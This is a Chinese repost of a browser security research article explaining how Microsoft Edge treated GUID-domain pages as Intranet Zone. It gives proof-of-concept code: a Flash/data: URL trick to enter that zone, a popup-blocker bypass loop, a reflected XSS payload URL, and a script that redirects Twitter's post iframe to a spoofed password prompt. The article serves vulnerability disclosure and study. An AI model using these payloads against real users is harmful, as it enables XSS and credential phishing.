通过伪造内网网站绕过弹出窗口屏蔽、XSS过滤器以及Navigate方法

时间：2023-04-24 17:12:02 | 来源：网站运营

时间：2023-04-24 17:12:02 来源：网站运营

通过伪造内网网站绕过弹出窗口屏蔽、XSS过滤器以及Navigate方法：原来的问题是无域网页(即具有空的document.domains的url)可以访问到任何文档来源的DOM，所以微软对他们添加一个随机域(GUID)进行修补。换句话说，无域空白网页现在已经不是空白的了。他们始终表现为{53394a4f-8c04-46ab-94af-3ab86ffcfd4c}这样的随机域名。

当我测试这个补丁的时候，我立即发现这个补丁从根本上解决了上述问题。我一开始的目标是分析这个补丁然后尝试绕过它，但是现在当我看到这个URL，它提醒了我Edge在某种程度上继承了IE的内部网络区域。所以，我在这一方面做了做文章。

内网 VS 互联网

你可能知道：浏览器对在内网中运行的网页比在互联网中运行的网页限制较少。而Edge是根据URL中有没有”.”判断内网页面与互联网页面，并且选择相应的判断机制。
当访问的域名没有点时，如http://localhost，Edge会认为这个页面来自于内网，对这个页面控制相对较少。当访问相同的网站，如：http://localhost.com时，Edge会认为来自于互联网，对这个页面控制比较严格。

Edge的判断是URL中不存在点，那么这个网站就是内网网站，当然，about:blank同样被认为是内网网站。

因此，如果我们通过欺骗Edge让它认为我们的网站是内网网站，那么我们就不会有那么多的安全限制。举个例子，禁用弹出窗口拦截器，xss过滤器，甚至启用SuperNavigate(可以引用不在域中的iframe以及windows的功能)。我们稍后会看到这个功能到底有多强大，但首先让我们看看在IE内网区域中有什么可能的。我知道我们正在谈论Edge，但是IE有一个简单的英文简单对话框，方便用户查看内网区域中哪些安全功能被禁用。

进入内网

上面的屏幕截图显示了至少有三个有趣的功能，如果能够进入内网，攻击者则可以使用它们。而事实证明，GUID使Edge认为我们在内网区域，然后允许我们绕过所有这些限制。所以根据这个漏洞，一旦我们进入内网，攻击变得非常容易，所以让我们开始吧。

1.在顶部加载data:url。我们本地现在是data,但是域名和加载此数据的域名相同。所以，我们现在还是在内网中。
2.使用document.write方法将data:url进行输出，这样他会返回给我们一个URL，但是这个域名是一个随机的GUID。所以我们已经进入到内网中。

Edge尝试阻止我们在顶部加载data:url，不过现在flash可以让我们加载它。所以我们通过flash执行一个简单的geturl方法。请看下面的代码。我们正在将一个Flash渲染在一个iframe中，Flash本身会通过一个data:url来更改顶部窗口的URL。

<iframe></iframe><script>window[0].location.replace('geturl.swf?TARGET=_top&REDIR=data:,'+'<script>window.onload=function(){'+' document.write("We are in a GUID URL (Intranet Zone) now");'+' document.close();'+'}</script>');</script>而且，将Flash放在iframe中是很重要的，否则Edge会拦截。但无论如何，一旦执行成功，我们就在内网区域。所以，让我们现在攻击吧～

内网中的攻击

以下三个POC都是基于通过上方代码进入内网区域的，然后再运行下面的内容。此外，payload会从外部脚本进行加载，以便我们可以更方便的工作。我不喜欢在data:url中对大量代码进行编码，因为这样容易使我混淆。

我们来看看如何绕过弹窗阻止程序。请注意，一旦您点击下面的POC链接，它将打开5个弹出窗口，无需您的互动。代码的工作原理就好像弹出窗口阻止程序不存在一样。

for (var i=0; i<5; i++){ window.open("http://www.bing.com","","width=200,height=600");}绕过弹窗阻止程序POC:MS Edge - popUp blocker bypass
这太棒了，现在我们可以没有限制的弹出任何窗口，所以我们绕过了弹窗阻止程序。那么，关于XSS过滤器我们怎么绕过呢？现在让我在另外一个网站执行XSS， caballero.com.ar：

window.open("https://www.caballero.com.ar/echo.php?xss=<script>alert(document.domain)</script>","_self");绕过XSS过滤器POC：MS Edge - XSS Filter Bypass

提醒一下，这些POC只能在内网环境中执行。事实上，把这种方法叫做一种攻击并不正确，因为这是在内网中的默认行为。我们做的只是将我们的工作环境转移到域里面，以便减少限制。这就是这个漏洞的原理，现在让我们再多介绍一种：SuperNavigate。你知道他是干什么的吗？他允许攻击者更改来自任意域的任意窗口以及iframe的url。

也许你现在有点困惑。现在我通过举个例子来解释一下：他允许攻击者更改在不同选项卡中运行的twitter中iframe的url。换句话说，我们不需要打开twitter那个选项卡。如果用户已经打开了twitter，我们实际上就可以和他一起进入内网区域。现在我们更改一个来自twitter命名为”twitter-iframe”的iframe的url。想看一看它怎么样工作的？

首先，让我们看一下这个iframe的代码：

win = window.open("https://www.twitter.com");function wait_for_tweet_post_iframe(){ // Wait until the twitter iframe exists if (win["tweet-post-iframe"]) { //Change the location of the twitter-iframe. This fires the prompt window.open("twitter_pass.html", "tweet-post-iframe"); clearInterval(interval); }}// Keep running until the twitter-iframe becomes availableinterval = setInterval(wait_for_tweet_post_iframe, 500);在twitter网页上绕过SuperNavigate的POC:MS Edge - SuperNavigate Bypass多么有趣呀，最后一件事情，也许你注意到Twitter的提示似乎真的来自一个Twitter域名。您知道，当提示处于打开状态时，它始终显示启动它的URL的域，就像这样：

但是，可以使用一个非常简单的方法来去掉这个提示，也就是说，可以通过about:blank来发出这样一个提示。换句话说，它重置了这个域名的提示。

我知道这没什么大不了，但是会使这个弹框更像真正twitter发出的。
如果你想进一步了解，或者你想在本地复现，我已经将所有POC打包，下载地址为：https://goo.gl/ryYMIm(墙内：链接: https://pan.baidu.com/s/1nvbQxNr 密码: x6k8)

本文参考来源于brokenbrowser，如若转载，请注明来源于嘶吼： 通过伪造内网网站绕过弹出窗口屏蔽、XSS过滤器以及Navigate方法 更多内容请关注“嘶吼专业版”——Pro4hou